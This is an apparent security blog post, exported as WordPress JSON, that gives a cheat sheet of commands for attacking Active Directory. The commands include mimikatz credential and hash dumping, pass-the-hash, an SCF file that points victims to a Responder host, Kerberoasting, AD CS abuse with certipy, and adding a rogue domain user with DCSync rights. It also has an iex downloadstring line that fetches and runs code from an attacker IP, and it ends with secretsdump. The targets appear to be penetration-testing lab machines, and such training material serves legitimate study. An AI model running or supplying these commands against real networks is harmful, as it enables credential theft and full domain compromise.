{"id":706,"date":"2025-02-15T23:03:11","date_gmt":"2025-02-15T23:03:11","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=706"},"modified":"2025-08-04T23:09:09","modified_gmt":"2025-08-04T23:09:09","slug":"adref-active-directory-reference","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/adref-active-directory-reference\/","title":{"rendered":"adref - Active Directory Reference"},"content":{"rendered":"\n<div class=\"wp-block-cover aligncenter\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1022\" height=\"560\" class=\"wp-block-cover__image-background wp-image-708\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2025\/02\/Screenshot-2025-02-15-175357.png\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">Having trouble with AD?<\/p>\n<\/div><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><em>Here's my ADREF.<\/em><br><\/p>\n\n\n\n<pre id=\"adref\" class=\"wp-block-code\"><code>=========================================================\n&#91;GTFOBins for Active Directory? 
Yes please!]\nhttps:&#47;&#47;wadcoms.github.io\n=========================================================\n\n&#91;ntlmrelay]\nhttps:\/\/raw.githubusercontent.com\/SecureAuthCorp\/impacket\/master\/examples\/ntlmrelayx.py\n\n=========================================================\nPowershell\n&#91;Script (.ps1) disabled]\nSet-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine\n\n$Bling$\n\nmimikatz.exe\nprivilege::debug\nsekurlsa::logonpasswords\n&#91;LOCATE NTLM\\* SHA1 HASHES]\n\n=========================================================\n&#91;Core net Commands]\nnet user\nnet user \/DOMAIN\nnet group \/DOMAIN\nnet share\nnet localgroup\n\n=========================================================\nGetSPN.ps1\nInvoke-Kerberoast.ps1\nPowerView.ps1\nSpray-Creds.ps1\n\n=========================================================\nPowershell\n&#91;Get Current Domain and fun]\n&#91;DirectoryServices.ActiveDirectory.ActiveDirectorySite]::GetComputerSite().Servers\n&#91;System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n&#91;DirectoryServices.ActiveDirectory.ActiveDirectorySite]::GetComputerSite().Servers | Select-Object -ExpandProperty Name\n\n=========================================================\n&#91;AD - Overpass The Hash]\nprivilege::debug\nsekurlsa::logonpasswords\n&lt;USERNAME>\nsekurlsa::tickets\n&#91;Group 0 - Ticket Granting Service]\n* Username: &lt;USER>\nsekurlsa::pth \/user:&lt;USER> \/domain:corp.com \/ntlm:&lt;NTLM_HASH> \/run:PowerShell.exe\n\n=========================================================\n&#91;PSEXEC Reference]\npsexec.py &lt;MACHINE>\/&lt;USER>:PASS@$IP\nExample:\npsexec.py THINC\/aduser:adpass@x.x.x.x\n\n=========================================================\n&#91;We can Write to a Share?]\n.......What can we do?\n\n# TO START - we're either Enumerating AD with NO CREDENTIALS\n# OR\n# We are Enumerating AD WITH CREDENTIALS. 
\n# If we have credentials, we can do a lot more from an automation standpoint but privilege escalation will still remain an issue.\n\n1. Scan the network. Find machines and open ports to exploit a service, with our payload sending back the current logged-in or exploited \n   user's NTLMv2 hash via LLMNR poisoning.\n\n2. Enumerate DNS, subdomains, etc., to find key servers like printers or open shares that can be leveraged for an LLMNR poisoning attack to retrieve an NTLMv2 hash.\n\n3. Deploy tools like evil-ssdp or evil-winrm if Active Directory credentials are available.\n\n4. Use KERBRUTE to brute force usernames using Kerberos error messages like `KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN` to identify valid accounts.\n\n5. Access a network share with a NULL Session to place an SCF file to trigger the Lan Manager Service.\n\nExample SCF File:\n&#91;shell]\nCommand=2\nIconFile=\\\\&lt;RESPONDER-IP>\\share\\test.ico\n&#91;Taskbar]\nCommand=ToggleDesktop\n\n6. Exploit PrintNightmare (CVE-2021-1675\/CVE-2021-34527) for domain controller compromise, if possible.\n\n7. 
Use misconfigured MSSQL servers for code execution via PowerUpSQL:\n   Import-Module .\\PowerUpSQL.psd1\n\n=========================================================\n&#91;AD CS ATTACK]\nntpdate -s ntp.ubuntu.com\nevil-winrm -i somehost.local -u &lt;user_here> -p '&lt;password_here>'\ncertipy find -dc-ip $IP -ns $IP -u &lt;user_here>@somehost.local -p '&lt;password_here>' -vulnerable -stdout\ncertipy ca -ca manager-DC01-CA -add-officer &lt;user_here> -username &lt;user_here>@somehost.local -p '&lt;password_here>'\ncertipy ca -ca manager-DC01-CA -issue-request $current_key -u &lt;user_here>@somehost.local -p '&lt;password_here>'\ncertipy req -ca manager-DC01-CA -target dc01.somehost.local -retrieve 13 -username &lt;user_here>@somehost.local -p '&lt;password_here>'\ncertipy auth -pfx administrator.pfx -dc-ip $IP\nntpdate $IP\ntimedatectl set-ntp off\nrdate -n $IP\ncertipy auth -pfx administrator.pfx -dc-ip $IP | cut -d\":\" -f3\nevil-winrm -i somehost.local -u administrator -H ae5064c2f62317332c88629e025924ef\n\n=========================================================\n&#91;AD - DCSYNC ATTACK]\n\u2022 ldapsearch -x -H ldap:\/\/$IP -b \"dc=htb,dc=local\"\n  -x = Anonymous Login\/NULL SESSIONS\n\n\u2022 WINDAPSEARCH to enumerate users (-U):\n  python \/opt\/windapsearch\/windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U\n\n\u2022 Extract Kerberos pre-auth hashes:\n  GetNPUsers.py htb.local\/svc-alfresco -dc-ip 10.129.95.210 -no-pass\n\n\u2192 &#91;Password CRACKED]\n\n\u2022 Add user to groups:\n  net user siren sirenpassword \/ADD \/DOMAIN\n  net group \"Exchange Windows Permissions\" siren \/ADD\n  net group \"Remote Management Users\" siren \/ADD\n\n\u2022 Use Evil-WinRM for execution:\n  upload powerview.ps1\n  iex(new-object net.webclient).downloadstring('http:\/\/10.10.14.247:8000\/powerview.ps1')\n  $pass = ConvertTo-SecureString 'sirenpassword' -AsPlainText -Force\n  $cred = New-Object System.Management.Automation.PSCredential('htb\\siren', $pass)\n  
Add-ObjectACL -PrincipalIdentity siren -Credential $cred -Rights DCSync\n\n\u2022 Dump secrets:\n  secretsdump.py htb\/siren@10.129.95.210\n  psexec.py administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6\n\n=========================================================\nC:> .\\mimikatz.exe\nprivilege::debug\ntoken::elevate\nlsadump::cache\n\nprivilege::debug\ntoken::elevate\nlsadump::lsa \/patch\n=========================================================<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"480\" height=\"197\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2025\/02\/thats-right.gif\" alt=\"\" class=\"wp-image-707\"\/><\/figure>\n<\/div>\n\n\n<p><strong>[+]<\/strong> <strong>.bashrc Alias:<\/strong><br><code>alias adref='clear ; cat $HOME\/referencestuff\/adref'<\/code><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Here's my ADREF. 
[+] .bashrc Alias:alias adref='clear ; cat $HOME\/referencestuff\/adref'<\/p>\n","protected":false},"author":1,"featured_media":708,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[108,110,106,107,111,138,109,2,62],"tags":[157,158],"class_list":["post-706","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assessment","category-blog","category-cybersecurity","category-engagement","category-guidee","category-infosec","category-penetration-test","category-s1ren","category-theory","tag-active-directory","tag-adref"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/706","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=706"}],"version-history":[{"count":4,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/706\/revisions"}],"predecessor-version":[{"id":776,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/706\/revisions\/776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/708"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=706"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=706"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}